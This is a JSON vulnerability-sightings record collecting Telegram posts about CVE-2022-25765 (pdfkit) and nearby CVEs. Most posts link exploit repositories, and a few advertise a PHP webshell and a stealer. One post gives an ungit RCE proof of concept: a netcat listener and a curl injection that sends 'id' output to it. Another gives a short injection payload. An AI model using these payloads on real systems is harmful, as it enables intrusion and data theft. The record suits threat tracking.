{"vulnerability": "CVE-2022-2576", "sightings": [{"uuid": "c05db7e1-ab7b-456b-84d4-7940f0921fb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3527", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1apdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765\nURL\uff1ahttps://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-04T21:05:25.000000Z"}, {"uuid": "312860af-b361-49f8-b3c8-e8a7046c834c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25766", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2364", "content": "#\u041f\u041e #CVE #POC\n\nungit RCE\nCVE-2022-25766\n\n\u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 (RCE) \u0447\u0435\u0440\u0435\u0437 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0438 /api/fetch. \u0423\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f (remote \u0438 ref) \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0435 git fetch. \u041f\u0443\u0442\u0435\u043c \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u043f\u0446\u0438\u0439 git \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b.\n\nPoC\n\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 ungit \u0438 \u0441\u043e\u0437\u0434\u0430\u0439\u0442\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\n\u0421\u043e\u0437\u0434\u0430\u0439\u0442\u0435 listener: nc -nvlp 8000\n\u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0435 \u044d\u0442\u0443 curl \u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u044b\u0432\u043e\u0434 \u043a\u043e\u043c\u0430\u043d\u0434\u044b id: curl -d '{\"path\":\"/home/ubuntu/poc/ungit\",\"remote\":\"--upload-pack=curl http://localhost:8000 --data \\\"$(id)\\\"\",\"ref\":\"foobar\",\"socketId\":1}' -H \"Content-Type: application/json\" -X POST http://localhost:8448/api/fetch", "creation_timestamp": "2022-08-25T19:00:05.000000Z"}, {"uuid": "1e760aff-236e-4309-81db-98820a3ec2ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3614", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-25765 pdfkit <0.8.6 command injection.\nURL\uff1ahttps://github.com/shamo0/PDFkit-CMD-Injection\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-21T14:30:47.000000Z"}, {"uuid": "bab29152-6ae0-4f5d-a556-0472a7fc385f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25768", "type": "seen", "source": "https://t.me/cvedetector/6032", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2022-25768 - Mautic Unrestricted Update Access Control Vulnerability ( privilege escalation )\", \n  \"Content\": \"CVE ID : CVE-2022-25768 \nPublished : Sept. 18, 2024, 9:15 p.m. | 37\u00a0minutes ago \nDescription : The logic in place to facilitate the update process via the user interface lacks access control to verify if permission exists to perform the tasks. Prior to this patch being applied it might be possible for an attacker to access the Mautic version number or to execute parts of the upgrade process without permission. As upgrading in the user interface is deprecated, this functionality is no longer required. \nSeverity: 7.0 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"18 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-19T00:17:01.000000Z"}, {"uuid": "a4e3638f-5c4c-4b04-8e2b-03b31fd3e222", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/simosaper/748", "content": "#exploit\n1. CVE-2022-26265:\nContao CMS v.1.5.0 - RCE\nhttps://github.com/Inplex-sys/CVE-2022-26265\n\n2. CVE-2022-25765:\npdfkit URL Command Injection\nhttps://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795\n]-> A Shell exploit: https://github.com/Atsukoro1/PDFKitExploit", "creation_timestamp": "2022-12-06T06:38:55.000000Z"}, {"uuid": "c0d7558d-56b5-44a6-a16d-93a223488a74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/1287", "content": "\u200b\u200bCVE-2022-25765\n\nExploit for CVE-2022-25765 command injection in pdfkit < 0.8.6\n\nhttps://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765\n\n#cve #poc #exploit", "creation_timestamp": "2023-01-30T22:53:50.000000Z"}, {"uuid": "fefb9a81-902d-4895-8c1c-a3a3c870e40c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "seen", "source": "https://t.me/proxy_bar/1347", "content": "CVE-2022-25765  -  PDFkit-CMD-Injection\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0434\u044b\u0440\u043a\u0438 \u0442\u0443\u0442\nexploit\n\n#exploit", "creation_timestamp": "2023-01-31T05:59:59.000000Z"}, {"uuid": "8c7351fc-42cb-4c72-bc9b-b4398d9d9bd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/BABATATASASA/3436", "content": "\u200b\u200bCVE-2022-25765 \n\npdfkit Exploit Reverse Shell\n\npdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765\n\nhttps://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell\n\n\u200b\u200bCVE-2022-45025\n\nCommand injection via PDF import in Markdown Preview Enhanced (VSCode, Atom)\n\nhttps://github.com/yuriisanin/CVE-2022-45025\n\n\u200b\u200bCVE-2022-36537\n\nZK Framework - Exposure of Sensitive Information to an Unauthorized Actor\n\nhttps://github.com/agnihackers/CVE-2022-36537-EXPLOIT\n\n\u200b\u200bCVE-2022-39066\n\nSQL Injection Vulnerability in ZTE MF286R\n\nhttps://github.com/v0lp3/CVE-2022-39066\n\n\u200b\u200bCVE-2022-46381\n\nYou can scan this vulnerability on your company's subdomains using the nuclei scanner with the template specified in this repo \"CVE-2022-46381.yaml\"\n\nhttps://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-46381\n\n\u200b\u200bCVE-2022-45771 - Pwndoc LFI to RCE\n\nPwndoc local file inclusion to remote code execution of Node.js code on the server.\n\nhttps://github.com/p0dalirius/CVE-2022-45771-Pwndoc-LFI-to-RCE\n\n\u200b\u200bCVE-2022-46169\n\nCacti remote_agent.php Unauthenticated Command Injection.\n\nhttps://github.com/0xf4n9x/CVE-2022-46169\n\n\u200b\u200bCVE-2022-45451\n\nPoC for CVE-2022-45451 Acronis Arbitrary File Read\n\nhttps://github.com/alfarom256/CVE-2022-45451\n\nCVE-2022-28672\n\nThis bug was Use after Free caused by improper handling of javascript object memory references.\n\nhttps://github.com/hacksysteam/CVE-2022-28672\n\nUse after Free - RCE Exploit: https://hacksys.io/blogs/foxit-reader-uaf-rce-jit-spraying-cve-2022-28672\n\n\u200b\u200bCVE-2003-0358\n\nBuffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges > via a long -s command line option.\n\nhttps://github.com/snowcra5h/CVE-2003-0358\n\n\u200b\u200bCVE-2022-39253\n\nDocker host file read\n\nhttps://github.com/ssst0n3/docker-cve-2022-39253-poc\n\n\u200b\u200bCVE-2022-48870\n\nmaccms admin+ xss attacks\n\nhttps://github.com/Cedric1314/CVE-2022-48870\n\n\u200b\u200bCVE-2022-2602\n\nPoC Kernel Privilege Escalation Linux\n\nhttps://github.com/kiks7/CVE-2022-2602-Kernel-Exploit\n\n\u200b\u200bEvilWfshbr\n\nCVE-2022-42046 Proof of Concept of wfshbr64.sys local privilege escalation\n\nhttps://github.com/kkent030315/CVE-2022-42046\n\n\u200b\u200bCVE-2022-2602\n\nThis repository contains exploits for CVE-2022-2602. There are two versions of it:\n\n\u25ab\ufe0f Exploit using userfaultfd technique.\n\u25ab\ufe0f Exploit using inode locking technique.\n\nhttps://github.com/LukeGix/CVE-2022-2602\n\n#cve #poc \n@pfkgit", "creation_timestamp": "2023-01-28T19:14:38.000000Z"}, {"uuid": "cc55a23e-5769-48f3-ad80-fc4ae36c91ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1638", "content": "#exploit\n1. CVE-2022-26265:\nContao CMS v.1.5.0 - RCE\nhttps://github.com/Inplex-sys/CVE-2022-26265\n\n2. CVE-2022-25765:\npdfkit URL Command Injection\nhttps://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795\n]-> A Shell exploit: https://github.com/Atsukoro1/PDFKitExploit", "creation_timestamp": "2022-12-06T04:04:20.000000Z"}, {"uuid": "2407c927-0628-4ff9-a226-44ed9f0cfd3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "Telegram/Jlnijv-_qCNdG8pk9ZaWqsDMPV8FiAY7bukyinbc-jdofzA", "content": "", "creation_timestamp": "2023-03-14T10:12:05.000000Z"}, {"uuid": "e61c7786-835a-432d-a471-b1ca3d5635e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-2576", "type": "seen", "source": "https://t.me/cibsecurity/47261", "content": "\u203c CVE-2022-2576 \u203c\n\nIn Eclipse Californium version 2.0.0 to 2.7.2 and 3.0.0-3.5.0 a DTLS resumption handshake falls back to a DTLS full handshake on a parameter mismatch without using a HelloVerifyRequest. Especially, if used with certificate based cipher suites, that results in message amplification (DDoS other peers) and high CPU load (DoS own peer). The misbehavior occurs only with DTLS_VERIFY_PEERS_ON_RESUMPTION_THRESHOLD values larger than 0.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-07-29T18:13:34.000000Z"}, {"uuid": "ecb933a4-dfd1-480d-8b85-f815c793c460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/2497", "content": "Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6\n\ndownload: https://system32.ink/news-feed/p/209/", "creation_timestamp": "2023-02-02T11:57:40.000000Z"}, {"uuid": "cb7594ca-3da8-40af-83c5-e417f2895847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25762", "type": "seen", "source": "https://t.me/cibsecurity/42604", "content": "\u203c CVE-2022-25762 \u203c\n\nIf a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause the a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently which could result in data being returned to the wrong use and/or other errors.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-13T12:26:42.000000Z"}, {"uuid": "f9f0c5eb-a5d5-4edb-ad50-1e633014f6f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25760", "type": "seen", "source": "https://t.me/cibsecurity/39137", "content": "\u203c CVE-2022-25760 \u203c\n\nAll versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-03-17T15:21:38.000000Z"}, {"uuid": "2a17a69b-d1b6-4109-8cd6-5fa51f9abec9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2533", "content": "#CVE-2022\npdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765\n\nhttps://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell\n\n@BlueRedTeam", "creation_timestamp": "2022-12-23T06:45:41.000000Z"}, {"uuid": "3f678c83-0e34-4816-8678-251146470b26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "seen", "source": "https://t.me/BlueRedTeam/2556", "content": "#CVE-2022\n7-Zip CVE-2022-29072 Mitigation - CHM file - This script detects if the .chm file exists and removes it.\n\nhttps://github.com/Phantomiman/7-Zip.chm-mitigiation\n\n#CVE-2022\nPoC for Acronis Arbitrary File Read - CVE-2022-45451\nhttps://github.com/alfarom256/CVE-2022-45451\n\n#webshell\nwebshell alfa php\n\nhttps://github.com/xstro04002/alfa-shell\n\nCVE-2022-25765 pdfkit <0.8.6 command injection.\n\nhttps://github.com/shamo0/PDFkit-CMD-Injection\n\nGet root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple's XNU source.\n\nhttps://github.com/Conradoduart3/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft\n\n@BlueRedTeam", "creation_timestamp": "2023-01-10T19:38:54.000000Z"}, {"uuid": "44466181-93f4-4202-8f97-6f5bbfa0fcd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/680", "content": "cve-2022-25765\n\nGET   /?name=%20ls\n\n#poc", "creation_timestamp": "2023-07-02T13:30:24.000000Z"}, {"uuid": "faa2c816-a451-4012-9b11-4fe050facea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7652", "content": "#exploit\n1. CVE-2022-44900:\nDirectory traversal vulnerability in SevenZipFile.extractall() function\nhttps://github.com/0xless/CVE-2022-44900-demo-lab\n\n2. CVE-2022-25765:\nPDFkit CMD Injection\nhttps://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765", "creation_timestamp": "2023-01-30T12:34:25.000000Z"}, {"uuid": "4dd691a0-413f-4a26-8d18-a4bdf9807253", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7308", "content": "#exploit\n1. CVE-2022-26265:\nContao CMS v.1.5.0 - RCE\nhttps://github.com/Inplex-sys/CVE-2022-26265\n\n2. CVE-2022-25765:\npdfkit URL Command Injection\nhttps://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795\n]-> A Shell exploit: https://github.com/Atsukoro1/PDFKitExploit", "creation_timestamp": "2022-12-06T11:01:01.000000Z"}, {"uuid": "9ff000c3-9289-4132-bac8-590d5afc9486", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-25765", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4604", "content": "PDFkit CMD-Injection (CVE-2022-25765)\n\nExploit\n\n#CVE #POC #Exploit \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-05-20T00:25:57.000000Z"}]}